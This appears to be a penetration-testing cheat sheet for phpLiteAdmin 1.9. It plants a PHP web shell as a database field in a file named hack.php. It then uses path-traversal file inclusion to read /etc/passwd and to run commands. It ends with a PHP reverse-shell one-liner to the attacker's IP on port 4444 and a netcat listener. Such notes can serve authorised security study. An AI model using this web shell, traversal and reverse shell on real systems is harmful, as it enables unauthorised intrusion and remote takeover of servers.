# phpLite

## PHP Code Injection

* <https://www.exploit-db.com/exploits/24044>
* Create an evil database entry that lets you execute php
* created in the directory: **/var/tmp**

```
-------------------
> searchsploit phpLiteAdmin 1.9

-------------------
Create Database : hack.php
Create New table: hack (1 field)
Field: <?php echo system($_REQUEST ["cmd"]); ?>
Type: TEXT
```

## Local File Inclusion (LFI)

* You will need an [LFI](https://pentest.mxhx.org/04-webapps/lfi) to execute the php code you just created

```
http://xxx.com/manage.php?notes=/myNotes/../../../../../../../../etc/passwd
http://xxx.com/manage.php?notes=/myNotes/../../../../var/tmp/hack.php&cmd=ls

URL Encode this:
.. &cmd=php -r '$sock=fsockopen("$MyIP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

nc -nvlp 4444
whoami ..www-data
```